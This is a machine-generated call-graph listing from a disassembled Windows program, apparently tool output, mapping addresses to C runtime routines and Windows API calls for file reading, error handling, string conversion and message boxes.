18834->18905 18862 132b7bc 18835->18862 18838 132bd7d 18836->18838 18839 131c9ce __dosmaperr 20 API calls 18838->18839 18839->18831 18840 132be45 GetFileType 18842 132be50 GetLastError 18840->18842 18843 132be97 18840->18843 18841 132be1a GetLastError 18845 131c998 __dosmaperr 20 API calls 18841->18845 18846 131c998 __dosmaperr 20 API calls 18842->18846 18907 131e6cc 18843->18907 18844 132bdc8 18844->18840 18844->18841 18906 132ba5e CreateFileW 18844->18906 18845->18831 18848 132be5e CloseHandle 18846->18848 18848->18831 18851 132be87 18848->18851 18850 132be0d 18850->18840 18850->18841 18853 131c9ce __dosmaperr 20 API calls 18851->18853 18855 132be8c 18853->18855 18854 132bf04 18859 132bf31 18854->18859 18931 132b811 18854->18931 18855->18831 18860 13218f4 __wsopen_s 29 API calls 18859->18860 18860->18862 18861 132bf42 18861->18862 18871 132b7e5 18862->18871 18872 132b80f 18871->18872 18873 132b7eb 18871->18873 18872->18823 19025 131e760 LeaveCriticalSection 18873->19025 18876 132bb14 18875->18876 18877 132bb2e 18875->18877 18876->18877 18879 131c9ce __dosmaperr 20 API calls 18876->18879 18958 132ba83 18877->18958 18880 132bb23 18879->18880 18881 1321788 __cftof 26 API calls 18880->18881 18881->18877 18882 132bb66 18883 132bb95 18882->18883 18885 131c9ce __dosmaperr 20 API calls 18882->18885 18890 132bbe8 18883->18890 18965 131d7e9 18883->18965 18887 132bb8a 18885->18887 18886 132bbe3 18889 1321798 __cftof 11 API calls 18886->18889 18886->18890 18888 1321788 __cftof 26 API calls 18887->18888 18888->18883 18891 132bc6e 18889->18891 18890->18827 18890->18828 18893 131e78f ___scrt_is_nonwritable_in_current_image 18892->18893 18972 1325ffe EnterCriticalSection 18893->18972 18895 131e7dd 18973 131e88c 18895->18973 18896 131e7bb 18976 131e562 18896->18976 18897 131e796 18897->18895 18897->18896 18902 131e829 EnterCriticalSection 18897->18902 18900 131e806 ___scrt_is_nonwritable_in_current_image 18900->18832 18902->18895 18903 131e836 LeaveCriticalSection 18902->18903 18903->18897 18905->18844 18906->18850 18908 131e744 18907->18908 18909 131e6db 18907->18909 18910 131c9ce __dosmaperr 20 API calls 18908->18910 18909->18908 18914 131e701 __wsopen_s 18909->18914 18911 131e749 18910->18911 18912 131c9bb __dosmaperr 20 API calls 18911->18912 18913 131e731 18912->18913 18913->18854 18916 132bc6f 18913->18916 18914->18913 18915 131e72b SetStdHandle 18914->18915 18915->18913 18917 132bc95 18916->18917 18918 132bc99 18916->18918 18917->18854 18918->18917 18919 1322807 __wsopen_s 28 API calls 18918->18919 18920 132bcab 18919->18920 18921 132bcd1 18920->18921 18932 132b844 18931->18932 18935 132b83d 18931->18935 18933 131d7e9 __wsopen_s 26 API calls 18932->18933 18940 132b865 18932->18940 18934 132b85c 18933->18934 18934->18940 18935->18859 18935->18861 18940->18935 18960 132ba9b 18958->18960 18959 132bab6 18959->18882 18960->18959 18961 131c9ce __dosmaperr 20 API calls 18960->18961 18962 132bada 18961->18962 18963 1321788 __cftof 26 API calls 18962->18963 18964 132bae5 18963->18964 18964->18882 18966 131d7f5 18965->18966 18967 131d80a 18965->18967 18968 131c9ce __dosmaperr 20 API calls 18966->18968 18967->18886 18969 131d7fa 18968->18969 18970 1321788 __cftof 26 API calls 18969->18970 18971 131d805 18970->18971 18971->18886 18972->18897 18984 1326046 LeaveCriticalSection 18973->18984 18975 131e893 18975->18900 18977 1320b10 _abort 20 API calls 18976->18977 18978 131e574 18977->18978 18981 132391e __wsopen_s 11 API calls 18978->18981 18982 131e581 18978->18982 18979 13209eb _free 20 API calls 18980 131e5d3 18979->18980 18980->18895 18983 131e6a9 EnterCriticalSection 18980->18983 18981->18978 18982->18979 18983->18895 18984->18975 19025->18872 17670 1311560 17671 1311578 17670->17671 17672 131156a 17670->17672 17676 131160d 17671->17676 17702 1311120 17671->17702 17748 13128c0 17672->17748 17675 131158b 17679 131159e 17675->17679 17720 1319f16 17675->17720 17723 13113d0 17679->17723 17680 13115af 17680->17676 17681 13115b7 htonl htonl 17680->17681 17682 1319f16 64 API calls 17681->17682 17683 13115e3 htonl 17682->17683 17684 13115f4 17683->17684 17685 1311615 htonl 17684->17685 17686 13115fe 17684->17686 17734 1319b2b 17685->17734 17757 13117b0 17686->17757 17690 1311632 17692 13117b0 59 API calls 17690->17692 17691 1311649 htonl 17737 1319934 17691->17737 17694 1311641 17692->17694 17695 131165e 17696 1311665 17695->17696 17697 1311677 17695->17697 17771 1311910 17696->17771 17744 1311200 17697->17744 17703 1319f16 64 API calls 17702->17703 17704 1311139 17703->17704 17705 1319b2b __fread_nolock 40 API calls 17704->17705 17706 1311149 17705->17706 17707 13111f2 17706->17707 17708 1319f16 64 API calls 17706->17708 17707->17675 17709 131116d 17708->17709 17710 1319b2b __fread_nolock 40 API calls 17709->17710 17711 131117d 17710->17711 17712 1319f16 64 API calls 17711->17712 17713 131118e 17712->17713 17714 1319b2b __fread_nolock 40 API calls 17713->17714 17715 131119e 17714->17715 17715->17707 17716 1319f16 64 API calls 17715->17716 17717 13111d0 17716->17717 17718 1319b2b __fread_nolock 40 API calls 17717->17718 17719 13111e0 17718->17719 17719->17675 17779 1319cdd 17720->17779 17722 1319f2c 17722->17679 17724 1319f16 64 API calls 17723->17724 17725 13113fa 17724->17725 17726 131143d 17725->17726 17728 1319b2b __fread_nolock 40 API calls 17725->17728 17727 131786a _ValidateLocalCookies 5 API calls 17726->17727 17729 131144e 17727->17729 17730 1311411 17728->17730 17729->17680 17730->17726 17731 1311452 htonl 17730->17731 17732 131786a _ValidateLocalCookies 5 API calls 17731->17732 17733 13114ab 17732->17733 17733->17680 18041 1319b48 17734->18041 17736 131162a 17736->17690 17736->17691 17738 1319940 17737->17738 17739 1319954 17737->17739 17740 131c9ce __dosmaperr 20 API calls 17738->17740 17739->17695 17741 1319945 17740->17741 17742 1321788 __cftof 26 API calls 17741->17742 17743 1319950 17742->17743 17743->17695 17745 131120b 17744->17745 17746 1311211 17744->17746 18180 1319889 17745->18180 18276 1314bf0 17748->18276 17750 13128f3 17751 1314bf0 59 API calls 17750->17751 17752 1312900 17751->17752 18291 131d62f 17752->18291 17755 131786a _ValidateLocalCookies 5 API calls 17756 1312921 17755->17756 17756->17671 17758 13117ec ___scrt_initialize_default_local_stdio_options 17757->17758 17759 131c90d 50 API calls 17758->17759 17760 13117fa 17759->17760 17761 131c9ce __dosmaperr 20 API calls 17760->17761 17762 13117ff 17761->17762 18743 131ca5d 17762->18743 17765 1311ac0 50 API calls 17766 1311824 17765->17766 17767 13119f0 59 API calls 17766->17767 17768 1311838 17767->17768 17769 131786a _ValidateLocalCookies 5 API calls 17768->17769 17770 131184a 17769->17770 17770->17676 17772 1311944 ___scrt_initialize_default_local_stdio_options 17771->17772 17773 131c90d 50 API calls 17772->17773 17774 1311952 17773->17774 17775 13119f0 59 API calls 17774->17775 17776 1311963 17775->17776 17777 131786a _ValidateLocalCookies 5 API calls 17776->17777 17778 131166f 17777->17778 17781 1319ce9 ___scrt_is_nonwritable_in_current_image 17779->17781 17780 1319cf5 17783 131c9ce __dosmaperr 20 API calls 17780->17783 17781->17780 17782 1319d1b 17781->17782 17792 131a847 EnterCriticalSection 17782->17792 17785 1319cfa 17783->17785 17787 1321788 __cftof 26 API calls 17785->17787 17786 1319d27 17793 1319e3d 17786->17793 17791 1319d05 ___scrt_is_nonwritable_in_current_image 17787->17791 17789 1319d3b 17804 1319d5a 17789->17804 17791->17722 17792->17786 17794 1319e5f 17793->17794 17795 1319e4f 17793->17795 17807 1319d64 17794->17807 17796 131c9ce __dosmaperr 20 API calls 17795->17796 17798 1319e54 17796->17798 17798->17789 17799 1319e82 17803 1319f01 17799->17803 17811 131da31 17799->17811 17803->17789 18040 131a85b LeaveCriticalSection 17804->18040 17806 1319d62 17806->17791 17808 1319d70 17807->17808 17809 1319d77 17807->17809 17808->17799 17809->17808 17810 1322807 __wsopen_s 28 API calls 17809->17810 17810->17808 17812 131da49 17811->17812 17813 1319ea9 17811->17813 17812->17813 17814 13209c5 __fread_nolock 26 API calls 17812->17814 17817 1322807 17813->17817 17815 131da69 17814->17815 17820 1322fa0 17815->17820 17818 132276e __wsopen_s 28 API calls 17817->17818 17819 132281d 17818->17819 17819->17803 17821 1322fac ___scrt_is_nonwritable_in_current_image 17820->17821 17822 1322fb4 17821->17822 17823 1322fcc 17821->17823 17824 131c9bb __dosmaperr 20 API calls 17822->17824 17825 132306a 17823->17825 17829 1323001 17823->17829 17826 1322fb9 17824->17826 17827 131c9bb __dosmaperr 20 API calls 17825->17827 17828 131c9ce __dosmaperr 20 API calls 17826->17828 17830 132306f 17827->17830 17831 1322fc1 ___scrt_is_nonwritable_in_current_image 17828->17831 17845 131e6a9 EnterCriticalSection 17829->17845 17833 131c9ce __dosmaperr 20 API calls 17830->17833 17831->17813 17835 1323077 17833->17835 17834 1323007 17836 1323023 17834->17836 17837 1323038 17834->17837 17838 1321788 __cftof 26 API calls 17835->17838 17839 131c9ce __dosmaperr 20 API calls 17836->17839 17846 132308b 17837->17846 17838->17831 17841 1323028 17839->17841 17842 131c9bb __dosmaperr 20 API calls 17841->17842 17843 1323033 17842->17843 17897 1323062 17843->17897 17845->17834 17847 13230b9 17846->17847 17884 13230b2 17846->17884 17848 13230dc 17847->17848 17849 13230bd 17847->17849 17854 132312d 17848->17854 17855 1323110 17848->17855 17850 131c9bb __dosmaperr 20 API calls 17849->17850 17853 13230c2 17850->17853 17851 131786a _ValidateLocalCookies 5 API calls 17852 1323293 17851->17852 17852->17843 17857 131c9ce __dosmaperr 20 API calls 17853->17857 17858 1323143 17854->17858 17861 1322807 __wsopen_s 28 API calls 17854->17861 17856 131c9bb __dosmaperr 20 API calls 17855->17856 17859 1323115 17856->17859 17860 13230c9 17857->17860 17900 1322c30 17858->17900 17863 131c9ce __dosmaperr 20 API calls 17859->17863 17864 1321788 __cftof 26 API calls 17860->17864 17861->17858 17866 132311d 17863->17866 17864->17884 17869 1321788 __cftof 26 API calls 17866->17869 17867 1323151 17868 132318a 17869->17884 17884->17851 18039 131e760 LeaveCriticalSection 17897->18039 17899 1323068 17899->17831 17945 1328d71 17900->17945 17902 1322c40 17904 1322c45 17902->17904 17954 1324425 GetLastError 17902->17954 17904->17867 17904->17868 17946 1328d8b 17945->17946 17947 1328d7e 17945->17947 17950 1328d97 17946->17950 17951 131c9ce __dosmaperr 20 API calls 17946->17951 17948 131c9ce __dosmaperr 20 API calls 17947->17948 17949 1328d83 17948->17949 17949->17902 17950->17902 17952 1328db8 17951->17952 17953 1321788 __cftof 26 API calls 17952->17953 17953->17949 17955 1324441 17954->17955 17956 132443b 17954->17956 18039->17899 18040->17806 18042 1319b54 ___scrt_is_nonwritable_in_current_image 18041->18042 18043 1319b8c ___scrt_is_nonwritable_in_current_image 18042->18043 18044 1319b94 18042->18044 18045 1319b67 ___scrt_fastfail 18042->18045 18043->17736 18054 131a847 EnterCriticalSection 18044->18054 18048 131c9ce __dosmaperr 20 API calls 18045->18048 18047 1319b9e 18055 131995f 18047->18055 18050 1319b81 18048->18050 18051 1321788 __cftof 26 API calls 18050->18051 18051->18043 18054->18047 18059 1319971 ___scrt_fastfail 18055->18059 18061 131998e 18055->18061 18056 131997e 18057 131c9ce __dosmaperr 20 API calls 18056->18057 18058 1319983 18057->18058 18060 1321788 __cftof 26 API calls 18058->18060 18059->18056 18059->18061 18063 13199d1 __fread_nolock 18059->18063 18060->18061 18068 1319bd3 18061->18068 18062 1319aed ___scrt_fastfail 18066 131c9ce __dosmaperr 20 API calls 18062->18066 18063->18061 18063->18062 18065 13209c5 __fread_nolock 26 API calls 18063->18065 18071 1322128 18063->18071 18136 1319bdb 18063->18136 18065->18063 18066->18058 18179 131a85b LeaveCriticalSection 18068->18179 18070 1319bd9 18070->18043 18072 1322152 18071->18072 18073 132213a 18071->18073 18075 13224bc 18072->18075 18081 1322197 18072->18081 18074 131c9bb __dosmaperr 20 API calls 18073->18074 18076 132213f 18074->18076 18077 131c9bb __dosmaperr 20 API calls 18075->18077 18078 131c9ce __dosmaperr 20 API calls 18076->18078 18079 13224c1 18077->18079 18084 1322147 18078->18084 18082 131c9ce __dosmaperr 20 API calls 18079->18082 18080 13221a2 18083 131c9bb __dosmaperr 20 API calls 18080->18083 18081->18080 18081->18084 18089 13221d2 18081->18089 18085 13221af 18082->18085 18086 13221a7 18083->18086 18084->18063 18087 1321788 __cftof 26 API calls 18085->18087 18088 131c9ce __dosmaperr 20 API calls 18086->18088 18087->18084 18088->18085 18090 13221eb 18089->18090 18091 1322211 18089->18091 18092 132222d 18089->18092 18090->18091 18098 13221f8 18090->18098 18093 131c9bb __dosmaperr 20 API calls 18091->18093 18150 1320a25 18092->18150 18094 1322216 18093->18094 18096 131c9ce __dosmaperr 20 API calls 18094->18096 18100 132221d 18096->18100 18097 1328d71 __fread_nolock 26 API calls 18101 1322396 18097->18101 18098->18097 18103 1321788 __cftof 26 API calls 18100->18103 18104 132240c 18101->18104 18107 13223af GetConsoleMode 18101->18107 18102 13209eb _free 20 API calls 18105 132224d 18102->18105 18134 1322228 __fread_nolock 18103->18134 18106 1322410 ReadFile 18104->18106 18108 13209eb _free 20 API calls 18105->18108 18109 1322484 GetLastError 18106->18109 18110 132242a 18106->18110 18107->18104 18111 13223c0 18107->18111 18113 1322491 18109->18113 18114 13223e8 18109->18114 18110->18109 18115 1322401 18110->18115 18111->18106 18116 13223c6 ReadConsoleW 18111->18116 18114->18134 18115->18134 18116->18115 18122 13223e2 GetLastError 18116->18122 18122->18114 18123 13209eb _free 20 API calls 18123->18084 18134->18123 18137 1319bec 18136->18137 18146 1319be8 __fread_nolock 18136->18146 18138 1319bf3 18137->18138 18141 1319c06 ___scrt_fastfail 18137->18141 18139 131c9ce __dosmaperr 20 API calls 18138->18139 18140 1319bf8 18139->18140 18142 1321788 __cftof 26 API calls 18140->18142 18143 1319c34 18141->18143 18144 1319c3d 18141->18144 18141->18146 18142->18146 18145 131c9ce __dosmaperr 20 API calls 18143->18145 18144->18146 18148 131c9ce __dosmaperr 20 API calls 18144->18148 18147 1319c39 18145->18147 18146->18063 18149 1321788 __cftof 26 API calls 18147->18149 18148->18147 18149->18146 18151 1320a63 18150->18151 18155 1320a33 _abort 18150->18155 18153 131c9ce __dosmaperr 20 API calls 18151->18153 18152 1320a4e RtlAllocateHeap 18154 1320a61 18152->18154 18152->18155 18153->18154 18154->18102 18155->18151 18155->18152 18156 1328686 _abort 7 API calls 18155->18156 18156->18155 18179->18070 18181 1319895 ___scrt_is_nonwritable_in_current_image 18180->18181 18182 13198a6 18181->18182 18183 13198bb 18181->18183 18184 131c9ce __dosmaperr 20 API calls 18182->18184 18192 13198b6 ___scrt_is_nonwritable_in_current_image 18183->18192 18193 131a847 EnterCriticalSection 18183->18193 18185 13198ab 18184->18185 18187 1321788 __cftof 26 API calls 18185->18187 18187->18192 18188 13198d7 18194 1319813 18188->18194 18190 13198e2 18192->17746 18193->18188 18195 1319820 18194->18195 18196 1319835 18194->18196 18197 131c9ce __dosmaperr 20 API calls 18195->18197 18199 131da31 62 API calls 18196->18199 18202 1319830 18196->18202 18198 1319825 18197->18198 18201 1319849 18199->18201 18202->18190 18277 1314c56 18276->18277 18278 1314bfa MultiByteToWideChar 18276->18278 18279 1314c5a MultiByteToWideChar 18277->18279 18280 1314c14 18278->18280 18281 1314c2b 18278->18281 18282 1314c73 18279->18282 18283 1314c8a 18279->18283 18294 1311860 GetLastError 18280->18294 18281->18279 18288 1314c3f 18281->18288 18285 1311860 57 API calls 18282->18285 18283->17750 18287 1314c82 18285->18287 18287->17750 18289 1311860 57 API calls 18288->18289 18290 1314c4e 18289->18290 18290->17750 18685 131d56e 18291->18685 18293 131290f 18293->17755 18295 13118a5 ___scrt_initialize_default_local_stdio_options 18294->18295 18306 131c90d 18295->18306 18299 13118b9 18323 1311ac0 18299->18323 18303 13118eb 18304 131786a _ValidateLocalCookies 5 API calls 18303->18304 18305 13118fe 18304->18305 18305->17750 18339 131a893 18306->18339 18309 1314860 18310 131486a __wsopen_s 18309->18310 18311 1314883 GetLastError 18310->18311 18312 1314889 FormatMessageW 18310->18312 18311->18312 18313 13148d8 18312->18313 18314 13148ac 18312->18314 18670 1314c90 18313->18670 18315 1311860 57 API calls 18314->18315 18317 13148bb 18315->18317 18319 131786a _ValidateLocalCookies 5 API calls 18317->18319 18318 13148ec 18320 131786a _ValidateLocalCookies 5 API calls 18318->18320 18321 13148d1 18319->18321 18322 131490e 18320->18322 18321->18299 18322->18299 18324 1311ad8 ___scrt_initialize_default_local_stdio_options 18323->18324 18325 131c90d 50 API calls 18324->18325 18326 13118d7 18325->18326 18327 13119f0 18326->18327 18328 13119fa __wsopen_s ___scrt_fastfail 18327->18328 18329 1314bf0 57 API calls 18328->18329 18330 1311a3c 18329->18330 18331 1311a43 18330->18331 18332 1311a89 MessageBoxA 18330->18332 18334 1314bf0 57 API calls 18331->18334 18333 131786a _ValidateLocalCookies 5 API calls 18332->18333 18335 1311aaa 18333->18335 18336 1311a53 MessageBoxW 18334->18336 18335->18303 18337 131786a _ValidateLocalCookies 5 API calls 18336->18337 18338 1311a82 18337->18338 18338->18303 18340 131a8d3 18339->18340 18341 131a8bb 18339->18341 18340->18341 18343 131a8db 18340->18343 18342 131c9ce __dosmaperr 20 API calls 18341->18342 18344 131a8c0 18342->18344 18356 131afae 18343->18356 18346 1321788 __cftof 26 API calls 18344->18346 18354 131a8cb 18346->18354 18348 131786a _ValidateLocalCookies 5 API calls 18350 13118b3 18348->18350 18350->18309 18354->18348 18357 131a8eb 18356->18357 18358 131afcb 18356->18358 18364 131af44 18357->18364 18358->18357 18359 1324425 pre_c_initialization 38 API calls 18358->18359 18360 131afec 18359->18360 18361 1324574 __fassign 38 API calls 18360->18361 18362 131b005 18361->18362 18384 13245a1 18362->18384 18365 131af63 18364->18365 18366 131c9ce __dosmaperr 20 API calls 18365->18366 18367 131a963 18366->18367 18368 131b242 18367->18368 18402 132151c 18368->18402 18370 131b267 18371 131c9ce __dosmaperr 20 API calls 18370->18371 18372 131b26c 18371->18372 18374 1321788 __cftof 26 API calls 18372->18374 18373 131a96e 18381 131b031 18373->18381 18374->18373 18375 131b252 18375->18370 18375->18373 18409 131b4f8 18375->18409 18417 131bd9e 18375->18417 18422 131b5dc 18375->18422 18427 131b62d 18375->18427 18456 131b912 18375->18456 18382 13209eb _free 20 API calls 18381->18382 18383 131b041 18382->18383 18383->18354 18385 13245b4 18384->18385 18386 13245c9 18384->18386 18385->18386 18388 1327996 18385->18388 18386->18357 18389 13279a2 ___scrt_is_nonwritable_in_current_image 18388->18389 18390 1324425 pre_c_initialization 38 API calls 18389->18390 18395 13279ac 18390->18395 18392 1327a30 ___scrt_is_nonwritable_in_current_image 18392->18386 18394 1320acd _abort 38 API calls 18394->18395 18395->18392 18395->18394 18396 13209eb _free 20 API calls 18395->18396 18397 1325ffe EnterCriticalSection 18395->18397 18398 1327a27 18395->18398 18396->18395 18397->18395 18401 1326046 LeaveCriticalSection 18398->18401 18400 1327a2e 18400->18395 18401->18400 18403 1321521 18402->18403 18404 1321534 18402->18404 18405 131c9ce __dosmaperr 20 API calls 18403->18405 18404->18375 18406 1321526 18405->18406 18407 1321788 __cftof 26 API calls 18406->18407 18408 1321531 18407->18408 18408->18375 18478 131b536 18409->18478 18411 131b4fd 18412 131b514 18411->18412 18413 131c9ce __dosmaperr 20 API calls 18411->18413 18412->18375 18414 131b506 18413->18414 18415 1321788 __cftof 26 API calls 18414->18415 18416 131b511 18415->18416 18416->18375 18418 131bda4 18417->18418 18419 131bdae 18417->18419 18487 131b188 18418->18487 18419->18375 18423 131b5e2 18422->18423 18424 131b5ec 18422->18424 18425 131b188 42 API calls 18423->18425 18424->18375 18426 131b5eb 18425->18426 18426->18375 18428 131b634 18427->18428 18429 131b64e 18427->18429 18430 131b67e 18428->18430 18431 131b996 18428->18431 18432 131b92a 18428->18432 18429->18430 18433 131c9ce __dosmaperr 20 API calls 18429->18433 18430->18375 18434 131b96e 18431->18434 18436 131b99d 18431->18436 18437 131b9dc 18431->18437 18432->18434 18438 131b937 18432->18438 18435 131b66a 18433->18435 18453 131b953 18434->18453 18455 131b967 18434->18455 18526 131c30b 18434->18526 18439 1321788 __cftof 26 API calls 18435->18439 18441 131b9a2 18436->18441 18449 131b945 18436->18449 18540 131c4e8 18437->18540 18444 131b97d 18438->18444 18438->18449 18438->18453 18442 131b675 18439->18442 18441->18434 18445 131b9a7 18441->18445 18442->18375 18444->18455 18512 131c1e3 18444->18512 18447 131b9ba 18445->18447 18448 131b9ac 18445->18448 18520 131c455 18447->18520 18448->18455 18516 131c4c9 18448->18516 18449->18453 18449->18455 18532 131bf17 18449->18532 18453->18455 18543 131c6ae 18453->18543 18455->18375 18457 131b996 18456->18457 18458 131b92a 18456->18458 18459 131b99d 18457->18459 18460 131b9dc 18457->18460 18466 131b96e 18457->18466 18458->18466 18468 131b937 18458->18468 18461 131b945 18459->18461 18462 131b9a2 18459->18462 18463 131c4e8 26 API calls 18460->18463 18464 131bf17 48 API calls 18461->18464 18476 131b953 18461->18476 18477 131b967 18461->18477 18465 131b9a7 18462->18465 18462->18466 18463->18476 18464->18476 18470 131b9ba 18465->18470 18471 131b9ac 18465->18471 18469 131c30b 26 API calls 18466->18469 18466->18476 18466->18477 18467 131b97d 18473 131c1e3 40 API calls 18467->18473 18467->18477 18468->18461 18468->18467 18468->18476 18469->18476 18472 131c455 26 API calls 18470->18472 18474 131c4c9 26 API calls 18471->18474 18471->18477 18472->18476 18473->18476 18474->18476 18475 131c6ae 40 API calls 18475->18477 18476->18475 18476->18477 18477->18375 18481 131b57b 18478->18481 18480 131b542 18480->18411 18482 131b5d1 18481->18482 18483 131b59d 18481->18483 18482->18480 18483->18482 18484 131c9ce __dosmaperr 20 API calls 18483->18484 18485 131b5c6 18484->18485 18486 1321788 __cftof 26 API calls 18485->18486 18486->18482 18490 1323e09 18487->18490 18491 1323e24 18490->18491 18494 1320bbb 18491->18494 18495 132151c 26 API calls 18494->18495 18499 1320bcd 18495->18499 18496 1320c08 18497 131afae __fassign 38 API calls 18496->18497 18504 1320c14 18497->18504 18498 1320be2 18500 131c9ce __dosmaperr 20 API calls 18498->18500 18499->18496 18499->18498 18511 131b1af 18499->18511 18501 1320be7 18500->18501 18502 1321788 __cftof 26 API calls 18501->18502 18502->18511 18503 1321561 42 API calls 18503->18504 18504->18503 18505 1320c43 18504->18505 18507 13214c8 26 API calls 18505->18507 18508 1320caf 18505->18508 18506 13214c8 26 API calls 18509 1320d76 18506->18509 18507->18508 18508->18506 18510 131c9ce __dosmaperr 20 API calls 18509->18510 18509->18511 18510->18511 18511->18375 18514 131c1fb 18512->18514 18513 131c230 18513->18453 18514->18513 18549 1324096 18514->18549 18517 131c4d5 18516->18517 18518 131c30b 26 API calls 18517->18518 18519 131c4e7 18518->18519 18519->18453 18522 131c46a 18520->18522 18521 131c9ce __dosmaperr 20 API calls 18523 131c473 18521->18523 18522->18521 18525 131c47e 18522->18525 18524 1321788 __cftof 26 API calls 18523->18524 18524->18525 18525->18453 18527 131c31c 18526->18527 18528 131c9ce __dosmaperr 20 API calls 18527->18528 18531 131c346 18527->18531 18529 131c33b 18528->18529 18530 1321788 __cftof 26 API calls 18529->18530 18530->18531 18531->18453 18533 131bf2d 18532->18533 18571 131abac 18533->18571 18535 131bf74 18581 1324e99 18535->18581 18539 131c00d 18539->18453 18541 131c30b 26 API calls 18540->18541 18542 131c4ff 18541->18542 18542->18453 18547 131c720 18543->18547 18548 131c6cb 18543->18548 18544 131786a _ValidateLocalCookies 5 API calls 18546 131c74f 18544->18546 18545 1324096 __cftof 40 API calls 18545->18548 18546->18455 18547->18544 18548->18545 18548->18547 18552 1323f75 18549->18552 18553 1323f89 18552->18553 18554 1323fae 18553->18554 18555 1323fbf 18553->18555 18565 1323f8d 18553->18565 18556 131c9ce __dosmaperr 20 API calls 18554->18556 18557 131afae __fassign 38 API calls 18555->18557 18558 1323fb3 18556->18558 18559 1323fca 18557->18559 18560 1321788 __cftof 26 API calls 18558->18560 18561 1323fd7 18559->18561 18562 1324034 WideCharToMultiByte 18559->18562 18560->18565 18564 1323fe5 ___scrt_fastfail 18561->18564 18566 132401b ___scrt_fastfail 18561->18566 18563 1324064 GetLastError 18562->18563 18562->18564 18563->18564 18563->18566 18564->18565 18567 131c9ce __dosmaperr 20 API calls 18564->18567 18565->18513 18566->18565 18568 131c9ce __dosmaperr 20 API calls 18566->18568 18567->18565 18569 1324087 18568->18569 18570 1321788 __cftof 26 API calls 18569->18570 18570->18565 18572 131abd7 18571->18572 18573 131abc8 18571->18573 18575 131abcd 18572->18575 18576 1320a25 __fread_nolock 21 API calls 18572->18576 18574 131c9ce __dosmaperr 20 API calls 18573->18574 18574->18575 18575->18535 18577 131abfe 18576->18577 18578 131ac15 18577->18578 18613 131b04b 18577->18613 18580 13209eb _free 20 API calls 18578->18580 18580->18575 18582 1324ea9 18581->18582 18587 1324ebf 18581->18587 18583 131c9ce __dosmaperr 20 API calls 18582->18583 18586 1324eae 18583->18586 18584 1324ed3 18585 131c9ce __dosmaperr 20 API calls 18584->18585 18588 1324ed8 18585->18588 18589 1321788 __cftof 26 API calls 18586->18589 18587->18584 18591 1324ee9 18587->18591 18590 1321788 __cftof 26 API calls 18588->18590 18603 131bfee 18589->18603 18590->18603 18593 1324f45 18591->18593 18594 1324f23 18591->18594 18592 1324f63 18597 1324fc2 18592->18597 18598 1324f8c 18592->18598 18593->18592 18595 1324f68 18593->18595 18616 1324d6d 18594->18616 18626 1324658 18595->18626 18654 132495b 18597->18654 18599 1324f91 18598->18599 18600 1324faa 18598->18600 18637 1324ca5 18599->18637 18647 1324b41 18600->18647 18603->18539 18606 131b12c 18603->18606 18661 1323dd9 18606->18661 18608 131b13e 18614 13209eb _free 20 API calls 18613->18614 18615 131b05a 18614->18615 18615->18578 18617 1324d93 18616->18617 18618 1324da8 18616->18618 18619 131786a _ValidateLocalCookies 5 API calls 18617->18619 18618->18618 18621 1320a73 26 API calls 18618->18621 18620 1324da4 18619->18620 18620->18603 18622 1324e4b 18621->18622 18622->18617 18623 1324e58 18622->18623 18624 1321798 __cftof 11 API calls 18623->18624 18627 132466c 18626->18627 18628 131afae __fassign 38 API calls 18627->18628 18629 132467e 18628->18629 18630 1324686 18629->18630 18631 132469a 18629->18631 18638 132974e 28 API calls 18637->18638 18639 1324cd3 18638->18639 18648 132974e 28 API calls 18647->18648 18649 1324b6e 18648->18649 18655 132974e 28 API calls 18654->18655 18656 1324983 18655->18656 18657 13291b9 26 API calls 18656->18657 18662 1323df1 18661->18662 18663 1323de7 18661->18663 18662->18608 18664 1323dbf 46 API calls 18663->18664 18664->18662 18671 1314cf8 18670->18671 18672 1314c9a WideCharToMultiByte 18670->18672 18673 1314cfc WideCharToMultiByte 18671->18673 18674 1314cb6 18672->18674 18678 1314ccd 18672->18678 18675 1314d30 18673->18675 18676 1314d19 18673->18676 18677 1311860 57 API calls 18674->18677 18675->18318 18679 1311860 57 API calls 18676->18679 18680 1314cc5 18677->18680 18678->18673 18681 1314ce1 18678->18681 18682 1314d28 18679->18682 18680->18318 18683 1311860 57 API calls 18681->18683 18682->18318 18684 1314cf0 18683->18684 18684->18318 18688 131d57a ___scrt_is_nonwritable_in_current_image 18685->18688 18686 131d588 18687 131c9ce __dosmaperr 20 API calls 18686->18687 18689 131d58d 18687->18689 18688->18686 18690 131d5b8 18688->18690 18691 1321788 __cftof 26 API calls 18689->18691 18692 131d5ca 18690->18692 18693 131d5bd 18690->18693 18700 131d598 ___scrt_is_nonwritable_in_current_image 18691->18700 18702 1321990 18692->18702 18694 131c9ce __dosmaperr 20 API calls 18693->18694 18694->18700 18696 131d5d3 18697 131d5e6 18696->18697 18698 131d5d9 18696->18698 18710 131d618 18697->18710 18699 131c9ce __dosmaperr 20 API calls 18698->18699 18699->18700 18700->18293 18703 132199c ___scrt_is_nonwritable_in_current_image 18702->18703 18714 1325ffe EnterCriticalSection 18703->18714 18705 13219aa 18715 1321a2a 18705->18715 18709 13219db ___scrt_is_nonwritable_in_current_image 18709->18696 18711 131d61c 18710->18711 18742 131a85b LeaveCriticalSection 18711->18742 18713 131d62d 18713->18700 18714->18705 18716 1321a4d 18715->18716 18717 1321aa6 18716->18717 18724 13219b7 18716->18724 18731 131a847 EnterCriticalSection 18716->18731 18732 131a85b LeaveCriticalSection 18716->18732 18718 1320b10 _abort 20 API calls 18717->18718 18719 1321aaf 18718->18719 18721 13209eb _free 20 API calls 18719->18721 18722 1321ab8 18721->18722 18722->18724 18733 132391e 18722->18733 18728 13219e6 18724->18728 18741 1326046 LeaveCriticalSection 18728->18741 18730 13219ed 18730->18709 18731->18716 18732->18716 18734 1323587 _abort 5 API calls 18733->18734 18735 1323945 18734->18735 18736 1323963 InitializeCriticalSectionAndSpinCount 18735->18736 18737 132394e 18735->18737 18736->18737 18738 131786a _ValidateLocalCookies 5 API calls 18737->18738 18739 1321ad7 18738->18739 18740 131a847 EnterCriticalSection 18739->18740 18740->18724 18741->18730 18742->18713 18748 131c9e1 18743->18748 18744 13244a9 _abort 20 API calls 18744->18748 18745 1320b10 _abort 20 API calls 18745->18748 18747 13209eb _free 20 API calls 18747->18748 18748->18743 18748->18744 18748->18745 18748->18747 18749 1311806 18748->18749 18750 1321798 __cftof 11 API calls 18748->18750 18751 13250a9 18748->18751 18749->17765 18750->18748 18753 1324ff8 18751->18753 18752 132500d 18754 131c9ce __dosmaperr 20 API calls 18752->18754 18755 1325012 18752->18755 18753->18752 18753->18755 18758 1325049 18753->18758 18756 1325038 18754->18756 18755->18748 18757 1321788 __cftof 26 API 